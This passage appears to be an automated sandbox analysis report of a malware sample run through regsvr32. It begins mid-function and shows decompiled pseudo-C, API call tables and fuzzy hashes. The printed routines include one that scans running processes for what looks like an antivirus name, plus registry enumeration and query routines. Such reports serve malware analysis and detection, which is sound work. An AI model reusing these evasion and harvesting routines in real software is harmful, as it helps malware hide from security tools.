					_t25 = CreateEventA(0xfba2f8, 1, 0, _t30);
					E00FB50CA(_t30);
				}
				_t12 =  *0xfba2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 == 0) {
						goto L11;
					}
					_t18 = E00FB513E(); // executed
					if(_t18 != 0) {
						goto L11;
					}
					_t28 = StrChrW( *_t32, 0x20);
					if(_t28 != 0) {
						 *_t28 =  *_t28 & 0x00000000;
						_t28 =  &(_t28[1]);
					}
					_t21 = E00FB6BE1(0, _t28,  *_t32, 0); // executed
					_t31 = _t21;
					if(_t31 == 0) {
						if(_t25 == 0) {
							goto L21;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							goto L19;
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E00FB51A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x00fb73c4
0x00fb73cb
0x00fb73d5
0x00fb73d9
0x00fb73df
0x00fb73ec
0x00fb73f3
0x00fb73f7
0x00fb7409
0x00fb740b
0x00fb740b
0x00fb7410
0x00fb7417
0x00fb7422
0x00000000
0x00000000
0x00fb7424
0x00fb742b
0x00000000
0x00000000
0x00fb7438
0x00fb743c
0x00fb743e
0x00fb7443
0x00fb7443
0x00fb744b
0x00fb7450
0x00fb7454
0x00fb7458
0x00000000
0x00000000
0x00fb7466
0x00fb746a
0x00000000
0x00000000
0x00fb746a
0x00000000
0x00fb746c
0x00fb746c
0x00fb746c
0x00fb7472
0x00fb7474
0x00fb7474
0x00fb747e
0x00fb7482
0x00fb7494
0x00fb7494
0x00fb7498
0x00fb749e
0x00fb749e
0x00fb74a1
0x00fb74a3
0x00fb74a6
0x00fb74a6
0x00fb74ad
0x00fb74b3
0x00fb74b3

APIs

Part of subcall function 00FB2DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,05739C98,7742C740,00FB55DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,00FB55DE), ref: 00FB2E20
Part of subcall function 00FB2DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2E44
Part of subcall function 00FB2DEA: lstrcat.KERNEL32(00000000,00000000), ref: 00FB2E4C

CreateEventA.KERNEL32(00FBA2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00FB30E1,?,?,?), ref: 00FB7402

Part of subcall function 00FB50CA: RtlFreeHeap.NTDLL(00000000,00000000,00FB4239,00000000,00000001,?,00000000,?,?,?,00FB6B8D,00000000,?,00000001), ref: 00FB50D6

StrChrW.SHLWAPI(00FB30E1,00000020,61636F4C,00000001,00000000,?,?,00000000,?,00FB30E1,?,?,?), ref: 00FB7432
WaitForSingleObject.KERNEL32(00000000,00004E20,00FB30E1,00000000,?,00000000,?,00FB30E1,?,?,?,?,?,?,?,00FB211B), ref: 00FB7460
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00FB30E1,?,?,?), ref: 00FB748E
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00FB30E1,?,?,?), ref: 00FB74A6

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: f1dc3d3d2d4c97c10276a2f4171fa4a2a95893592d4cba163d19fe3ed708dcd2
Instruction ID: 2084e322d2964b7a22d70ab3d07c0b54313591212cdb89db3e66df2cf845c1c3
Opcode Fuzzy Hash: f1dc3d3d2d4c97c10276a2f4171fa4a2a95893592d4cba163d19fe3ed708dcd2
Instruction Fuzzy Hash: 4521EA32909716EBD721BB6A8C84BD77AE8AFC8772F154624FE019B291DB74DC006E50

Uniqueness

Uniqueness Score: -1.00%

Function 00FB513E, Relevance: 7.5, APIs: 5, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB513E() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300); // executed
					while(_t8 != 0) {
						_t9 =  *0xfba2d4; // 0x477d5a8
						_t2 = _t9 + 0xfbbdd4; // 0x73617661
						if(StrStrIA( &_v264, _t2) != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00fb5149
0x00fb514e
0x00fb5153
0x00fb5157
0x00fb5161
0x00fb5192
0x00fb5168
0x00fb516d
0x00fb5183
0x00fb519a
0x00fb5185
0x00fb518d
0x00000000
0x00fb518d
0x00fb519b
0x00fb519c
0x00000000
0x00fb519c
0x00000000
0x00fb5196
0x00fb51a2
0x00fb51a7

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FB514E
Process32First.KERNEL32(00000000,?), ref: 00FB5161
StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 00FB517B
Process32Next.KERNEL32(00000000,?), ref: 00FB518D
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00FB519C

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 5277ca4ad7afb878f95c78a0b44f4261717e2a4636934ba2eff7d0d6323b0614
Instruction ID: 2297e06274c0bb415f4bd779a381fd105f8cf0d42beb8358180b5e64fbf65b62
Opcode Fuzzy Hash: 5277ca4ad7afb878f95c78a0b44f4261717e2a4636934ba2eff7d0d6323b0614
Instruction Fuzzy Hash: DEF0B4726015286ADB61A77BCC89FEB77ACDBC4B54F000161F955C2001EA3C9E47AFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB4039, Relevance: 6.1, APIs: 4, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB4039(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E00FB6837(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E00FB50CA(_v28);
							goto L17;
						}
						_t42 = E00FB1D57(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E00FB50CA(_v24);
						_v20 = _v16;
						_t47 = E00FB6837(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0xfba2c4, 0) == 0x102);
				goto L16;
			}

0x00fb4039
0x00fb4053
0x00fb4056
0x00fb4059
0x00fb405c
0x00fb405f
0x00fb4065
0x00fb4069
0x00fb4143
0x00fb4147
0x00fb4147
0x00fb4072
0x00fb4079
0x00fb4080
0x00fb4083
0x00fb4138
0x00fb413b
0x00000000
0x00fb4141
0x00fb4089
0x00fb408c
0x00fb4093
0x00fb409d
0x00fb40a6
0x00fb40ac
0x00fb40b4
0x00fb40ec
0x00fb4126
0x00fb412c
0x00fb412e
0x00fb412e
0x00fb4130
0x00fb4133
0x00000000
0x00fb4133
0x00fb4101
0x00fb4106
0x00fb410a
0x00000000
0x00000000
0x00000000
0x00fb410a
0x00fb40b9
0x00fb40c8
0x00000000
0x00000000
0x00fb40cd
0x00fb40d6
0x00fb40d9
0x00fb40e0
0x00fb40e3
0x00fb40be
0x00fb40be
0x00000000
0x00fb40be
0x00fb40e7
0x00000000
0x00fb40e7
0x00fb40bb
0x00000000
0x00fb410c
0x00fb4119
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00FB30C2,?), ref: 00FB405F

Part of subcall function 00FB6837: RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

RegEnumKeyExA.KERNELBASE(?,?,?,00FB30C2,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00FB30C2), ref: 00FB40A6
WaitForSingleObject.KERNEL32(00000000,?,?,?,00FB30C2,?,00FB30C2,?,?,?,?,?,00FB30C2,?), ref: 00FB4113
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00FB30C2,?,?,?,?,?,00FB211B,?), ref: 00FB413B

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: f68881cb4b36dc8c64f9385cdaee809420f558e38fbb287dabad7ad816e8acdb
Instruction ID: eff801fc28b9ebc803074e0630c478f152b38116ae98a4d5044fff33ee0ad588
Opcode Fuzzy Hash: f68881cb4b36dc8c64f9385cdaee809420f558e38fbb287dabad7ad816e8acdb
Instruction Fuzzy Hash: A0315C72C00119BBCF22AFAADD859EEFFB9EF54350F104126E611B2161D2745E80EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5C35, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00FB5C8C
SysAllocString.OLEAUT32(00FB1E05), ref: 00FB5CCF
SysFreeString.OLEAUT32(00000000), ref: 00FB5CE3
SysFreeString.OLEAUT32(00000000), ref: 00FB5CF1

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: b341526e14eb15d4040dc7d328c5c29070a08bc01552108d7884f5f9c0d376b5
Instruction ID: 8870c49e722c9cbf9a19f8bf8c1a16811ec76eb07a5fabe39c28fba72bcc5be6
Opcode Fuzzy Hash: b341526e14eb15d4040dc7d328c5c29070a08bc01552108d7884f5f9c0d376b5
Instruction Fuzzy Hash: 123110B1900209EFCB05DF99D8C49EE7BB5FF48350B20452EF905A7210D7799945EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FB3032, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00FB3032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E00FB6710(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00FB15B9(_t23);
						}
					}
					return _t38;
				}
				_t26 = E00FB4C8C(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xfba2f8, 1, 0,  *0xfba394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					FindCloseChangeNotification(_t40); // executed
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00FB4039(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00FB1D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00FB3C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00FB73C3( &_v32, _t39);
					goto L13;
				}
			}

0x00fb3032
0x00fb303f
0x00fb3045
0x00fb3046
0x00fb3047
0x00fb3048
0x00fb3049
0x00fb304d
0x00fb3054
0x00fb3059
0x00fb305d
0x00fb30e5
0x00fb30e5
0x00fb30e8
0x00fb30ea
0x00fb30f2
0x00fb30f8
0x00fb30fb
0x00fb30fb
0x00fb30f8
0x00fb3106
0x00fb3106
0x00fb3069
0x00fb3070
0x00fb3072
0x00fb3072
0x00fb3089
0x00fb308d
0x00fb3090
0x00fb309b
0x00fb30a2
0x00fb30a2
0x00fb30ae
0x00fb30af
0x00fb30bd
0x00fb30b1
0x00fb30b1
0x00fb30b2
0x00fb30b3
0x00fb30b4
0x00fb30b5
0x00fb30b6
0x00fb30b6
0x00fb30c2
0x00fb30c7
0x00fb30c9
0x00fb30cb
0x00fb30cb
0x00fb30d2
0x00000000
0x00fb30d4
0x00fb30d4
0x00fb30e1
0x00000000
0x00fb30e1

APIs

CreateEventA.KERNEL32(00FBA2F8,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730,?,?,?,?,00FB211B,?,00000001), ref: 00FB3083
SetEvent.KERNEL32(00000000,?,?,?,?,00FB211B,?,00000001,00FB560C,00000002,?,?,00FB560C), ref: 00FB3090
Sleep.KERNELBASE(00000BB8,?,?,?,?,00FB211B,?,00000001,00FB560C,00000002,?,?,00FB560C), ref: 00FB309B
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,00FB211B,?,00000001,00FB560C,00000002,?,?,00FB560C), ref: 00FB30A2

Part of subcall function 00FB4039: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00FB30C2,?), ref: 00FB405F
Part of subcall function 00FB4039: RegEnumKeyExA.KERNELBASE(?,?,?,00FB30C2,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00FB30C2), ref: 00FB40A6
Part of subcall function 00FB4039: WaitForSingleObject.KERNEL32(00000000,?,?,?,00FB30C2,?,00FB30C2,?,?,?,?,?,00FB30C2,?), ref: 00FB4113
Part of subcall function 00FB4039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00FB30C2,?,?,?,?,?,00FB211B,?), ref: 00FB413B

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
String ID:
API String ID: 780868161-0
Opcode ID: 1b70462c7bec13e9d43261f5b776f92ac0ac1752e10c4725cacce9230d5d5a72
Instruction ID: 0b360686a1b60f4752039981313d710b7c3f34dead8b00b23ffdecb18545f701
Opcode Fuzzy Hash: 1b70462c7bec13e9d43261f5b776f92ac0ac1752e10c4725cacce9230d5d5a72
Instruction Fuzzy Hash: 12219573D44218ABCB10BFEA8C859EE77BDAF443A4B044525FA11A7100DB75EE44AFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB6A36, Relevance: 6.1, APIs: 4, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB6A36(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E00FB6837(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E00FB50CA(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12); // executed
					}
					L12:
					return _t43;
				}
				_t43 = E00FB4323(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}

0x00fb6a42
0x00fb6a65
0x00fb6a6f
0x00fb6a75
0x00fb6a79
0x00fb6a91
0x00fb6a96
0x00fb6ade
0x00fb6a98
0x00fb6aa0
0x00fb6aa4
0x00fb6adb
0x00fb6aa6
0x00fb6ab8
0x00fb6abc
0x00fb6ad2
0x00fb6abe
0x00fb6ac1
0x00fb6ac3
0x00fb6ac8
0x00fb6acd
0x00fb6acd
0x00fb6ac8
0x00fb6abc
0x00fb6aa4
0x00fb6ae6
0x00fb6ae6
0x00fb6aed
0x00fb6af3
0x00fb6af3
0x00fb6a5b
0x00fb6a5f
0x00000000
0x00000000
0x00000000

APIs

RegOpenKeyW.ADVAPI32(80000002,05739D8C,05739D8C), ref: 00FB6A6F
RegQueryValueExW.KERNELBASE(05739D8C,?,00000000,80000002,00000000,00000000,?,00FB1E36,3D00FB90,80000002,00FB30C2,00000000,00FB30C2,?,05739D8C,80000002), ref: 00FB6A91
RegQueryValueExW.ADVAPI32(05739D8C,?,00000000,80000002,00000000,00000000,00000000,?,00FB1E36,3D00FB90,80000002,00FB30C2,00000000,00FB30C2,?,05739D8C), ref: 00FB6AB6
RegCloseKey.KERNELBASE(05739D8C,?,00FB1E36,3D00FB90,80000002,00FB30C2,00000000,00FB30C2,?,05739D8C,80000002,00000000,?), ref: 00FB6AE6

Part of subcall function 00FB4323: SafeArrayDestroy.OLEAUT32(00000000), ref: 00FB43A8

Part of subcall function 00FB50CA: RtlFreeHeap.NTDLL(00000000,00000000,00FB4239,00000000,00000001,?,00000000,?,?,?,00FB6B8D,00000000,?,00000001), ref: 00FB50D6

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
String ID:
API String ID: 486277218-0
Opcode ID: 8c65cb42d7ed97fa5fbb24e68e6546cdbfb6a24e915a15bd804ee9dbcc702a09
Instruction ID: 65e9a126a56513d6ab502c4133c136c3996a0c235b85ca48a3193ba75c8af9c1
Opcode Fuzzy Hash: 8c65cb42d7ed97fa5fbb24e68e6546cdbfb6a24e915a15bd804ee9dbcc702a09
Instruction Fuzzy Hash: 9321E67290011EBFCF11AE95DC809EE7BADEB083A0B148125FE15A7120D63ADD64AF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB4D09, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FB4D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00FB6837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16); // executed
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00fb4d15
0x00fb4d19
0x00fb4d1a
0x00fb4d1b
0x00fb4d1d
0x00fb4d1f
0x00fb4d24
0x00fb4d27
0x00fb4dbe
0x00fb4dc5
0x00fb4dc5
0x00fb4d30
0x00fb4d37
0x00fb4d47
0x00fb4d47
0x00fb4d4d
0x00fb4d4f
0x00fb4d54
0x00fb4d5d
0x00fb4d65
0x00fb4d68
0x00fb4d73
0x00fb4d77
0x00fb4d79
0x00fb4d7a
0x00fb4d83
0x00fb4d87
0x00fb4d98
0x00fb4d89
0x00fb4d8e
0x00fb4d93
0x00fb4da2
0x00fb4da2
0x00fb4d77
0x00fb4da8
0x00fb4dae
0x00fb4dae
0x00fb4db7
0x00fb4dbc
0x00fb4dbc
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00FB4D37
lstrlenW.KERNEL32(?), ref: 00FB4D6D
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00FB4D8E
SysFreeString.OLEAUT32(?), ref: 00FB4DA2

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 11acd875c39e6537f05bd03b43f63a6a1a233a3549855e73ea82e58768f66669
Instruction ID: 109644a8f0c3f8cd1dc90bccf91b8fb952ad5fd21a1376d5bb462589a0682228
Opcode Fuzzy Hash: 11acd875c39e6537f05bd03b43f63a6a1a233a3549855e73ea82e58768f66669
Instruction Fuzzy Hash: 53213D75A00219FFCB10DFA9C9849DEBBB8FF48351B104169E905E7211E774EA41EF60

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1AB8, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB1AB8(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00FB4C8C(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xfba2d4; // 0x477d5a8
				_t4 = _t24 + 0xfbbd60; // 0x5739308
				_t5 = _t24 + 0xfbbd08; // 0x4f0053
				_t26 = E00FB5384( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xfba2d4; // 0x477d5a8
						_t11 = _t32 + 0xfbbd54; // 0x57392fc
						_t48 = _t11;
						_t12 = _t32 + 0xfbbd08; // 0x4f0053
						_t52 = E00FB5D37(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xfba2d4; // 0x477d5a8
							_t13 = _t35 + 0xfbbd9e; // 0x30314549
							if(E00FB74B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0xfba2b4 - 6;
								if( *0xfba2b4 <= 6) {
									_t42 =  *0xfba2d4; // 0x477d5a8
									_t15 = _t42 + 0xfbbbaa; // 0x52384549
									E00FB74B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0xfba2d4; // 0x477d5a8
							_t17 = _t38 + 0xfbbd98; // 0x5739340
							_t18 = _t38 + 0xfbbd70; // 0x680043
							_t45 = E00FB1F7A(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0xfba290, 0, _t52);
						}
					}
					HeapFree( *0xfba290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00FB3C84(_t54);
				}
				return _t45;
			}

0x00fb1ab8
0x00fb1ac8
0x00fb1acb
0x00fb1ad2
0x00fb1ad4
0x00fb1ad4
0x00fb1ad7
0x00fb1adc
0x00fb1ae3
0x00fb1af0
0x00fb1af5
0x00fb1af9
0x00fb1b07
0x00fb1b15
0x00fb1b19
0x00fb1baa
0x00fb1baa
0x00fb1b1f
0x00fb1b1f
0x00fb1b24
0x00fb1b24
0x00fb1b2b
0x00fb1b37
0x00fb1b39
0x00fb1b3b
0x00fb1b3d
0x00fb1b44
0x00fb1b56
0x00fb1b58
0x00fb1b5f
0x00fb1b61
0x00fb1b68
0x00fb1b73
0x00fb1b73
0x00fb1b5f
0x00fb1b78
0x00fb1b7d
0x00fb1b84
0x00fb1ba2
0x00fb1ba4
0x00fb1ba4
0x00fb1b3b
0x00fb1bb6
0x00fb1bb6
0x00fb1bb8
0x00fb1bbd
0x00fb1bbf
0x00fb1bbf
0x00fb1bca

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05739308,00000000,?,74B5F710,00000000,74B5F730), ref: 00FB1B07
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05739340,?,00000000,30314549,00000014,004F0053,057392FC), ref: 00FB1BA4
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00FB20B0), ref: 00FB1BB6

